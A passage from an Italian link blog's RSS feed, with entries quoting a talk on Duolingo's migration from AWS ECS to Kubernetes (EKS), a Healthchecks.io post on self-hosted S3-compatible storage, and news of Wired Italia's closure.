        <![CDATA[<p><a href="https://www.infoq.com/presentations/duolingo-eks-kubernetes/"><strong>Duolingo's Kubernetes Leap</strong></a>. Non l'ho visto, ma qui Duolingo spiega la migrazione da AWS ECS a EKS.</p>
<blockquote>
<p>To give you an idea of the scale that we're looking at, Duolingo currently has over 128 million monthly active users, and we have over 250 courses that you can learn on the app. [...] On the engineering side, we have over 400 engineers and more than 500 backend services, just to give you an idea of the scale of this migration that we're going to be looking at today.</p>
</blockquote>
<blockquote>
<p>Previously, the 500-plus backend services that I mentioned at the beginning are running on AWS ECS. We have some workloads that are running on different infrastructure, but for the mass majority, they're on ECS. That's what I'm going to be focusing on. We're going to be moving from ECS to EKS. ECS is AWS's container orchestration solution. It's a managed solution. It's very simple and straightforward to use. We've been actually super happy with ECS over the past year, and it served our needs very well. Now as we've grown to a much bigger scale, as I mentioned, Kubernetes just offers a much more feature-rich ecosystem and open-source platform, as well as specific features that ECS does not give us.</p>
</blockquote>
<p><a href="https://uploads.notedimatteo.it/2026/04/d00389d93ccf.jpg"><img src="https://uploads.notedimatteo.it/2026/04/d00389d93ccf_preview.jpg" alt="" loading="lazy" width="1200" height="674"></a></p>]]>
      </content:encoded>
    </item>
    <item>
      <title>#453</title>
      <link>https://notedimatteo.it/453</link>
      <guid>https://notedimatteo.it/453</guid>
      <pubDate>Sat, 18 Apr 2026 08:20:34 GMT</pubDate>
      <category>segnalibri</category>
      <category>cloud</category>
      <category>storage</category>
      <description>[**Healthchecks.io Now Uses Self-hosted Object Storage**](https://blog.healthchecks.io/2026/04/healthchecks-io-now-uses-self-hosted-object-storage/). Il maestro del self-hosting ora self-hosta anche u…</description>
      <content:encoded>
        <![CDATA[<p><a href="https://blog.healthchecks.io/2026/04/healthchecks-io-now-uses-self-hosted-object-storage/"><strong>Healthchecks.io Now Uses Self-hosted Object Storage</strong></a>. Il maestro del self-hosting ora self-hosta anche uno storage S3-compatible, basato sul file system:</p>
<blockquote>
<p><a href="https://github.com/versity/versitygw/">Versity S3 Gateway</a> turns your local filesystem into an S3 server. An S3 PutObject operation creates a regular file on the filesystem, an S3 GetObject operation reads a regular file from the filesystem, and an S3 DeleteObject operation deletes a file from the filesystem. It does not need a separate database for metadata storage. You can use any backup tool to take backups. The upgrade procedure is: replace a single binary and restart a systemd service. It is written in Go, and is being actively developed. The one bug I found and reported was fixed in just a few days.</p>
</blockquote>
<p>Il tradeoff è l'assenza di HA e replicazione:</p>
<blockquote>
<p>With this setup, if both drives on the object storage server fail at the same time, the system could lose up to 2 hours of not yet backed-up ping request bodies. This can be improved, as usual, with the cost of extra complexity.</p>
</blockquote>
<p>E costa di più:</p>
<blockquote>
<p>The costs have increased: renting an additional dedicated server costs more than storing ~100GB at a managed object storage service. But the improved performance and reliability are worth it.</p>
</blockquote>]]>
      </content:encoded>
    </item>
    <item>
      <title>#452</title>
      <link>https://notedimatteo.it/452</link>
      <guid>https://notedimatteo.it/452</guid>
      <pubDate>Fri, 17 Apr 2026 07:28:28 GMT</pubDate>
      <category>note</category>
      <category>informazione</category>
      <description>Oh, [chiude Wired Italia](https://www.condenast.com/news/a-memo-from-ceo-roger-lynch-brand-and-technology-updates). Unprofitable, a differenza delle altre edizioni in altri Paesi dove la strategia si …</description>
      <content:encoded>
        <![CDATA[<p>Oh, <a href="https://www.condenast.com/news/a-memo-from-ceo-roger-lynch-brand-and-technology-updates">chiude Wired Italia</a>. Unprofitable, a differenza delle altre edizioni in altri Paesi dove la strategia si è <a href="https://www.ilpost.it/charlie/la-svolta-di-wired/">spostata</a> dall'occuparsi solo di tecnologia a temi più politici, con successo di abbonamenti.</p>
<p>Aggiornamento: non lo sapevano nemmeno loro. Dal <a href="https://www.ilpost.it/2026/04/17/wired-italia-chiude/">Post</a>:</p>
<blockquote>
<p>Nel 2015 la redazione era già stata dimezzata, da 12 a 6 giornalisti, sempre per la necessità di ridurre i costi e rimettere in ordine i conti: anche all’epoca le pubblicazioni erano state interrotte prima di riprendere a cadenza trimestrale dopo la riorganizzazione della redazione. Oggi la redazione è composta dal direttore, da tre giornalisti, cinque grafici, tre collaboratori fissi e molti giornalisti collaboratori occasionali.</p>
<p>Fonti di Condé Nast Italia che hanno chiesto di rimanere anonime hanno detto che l’azienda ha comunicato la chiusura alla redazione dieci minuti prima di pubblicare il comunicato online. Sostengono inoltre che i dati citati dall’azienda non abbiano fondamento e che nelle ultime settimane non ci fosse stata nessuna avvisaglia di possibili ridimensionamenti o addirittura rischi di chiusura. L’azienda non ha comunicato quando si interromperanno le pubblicazioni né come intende gestire l’eventuale uscita o il ricollocamento dei giornalisti e dei grafici: per ora rallenterà la frequenza di pubblicazione degli articoli sul sito internet, ma non è ancora chiaro da quando non sarà più aggiornato.</p>
<p>Oltre al sito e alla rivista, negli ultimi anni Wired Italia ha organizzato diversi festival come il Wired Next Fest. Lynch ha detto che Wired continuerà a organizzare eventi in Europa, gestiti dal Regno Unito, ma anche in questo caso non è ancora chiaro come.</p>
</blockquote>]]>
      </content:encoded>
    </item>
  </channel>
</rss>
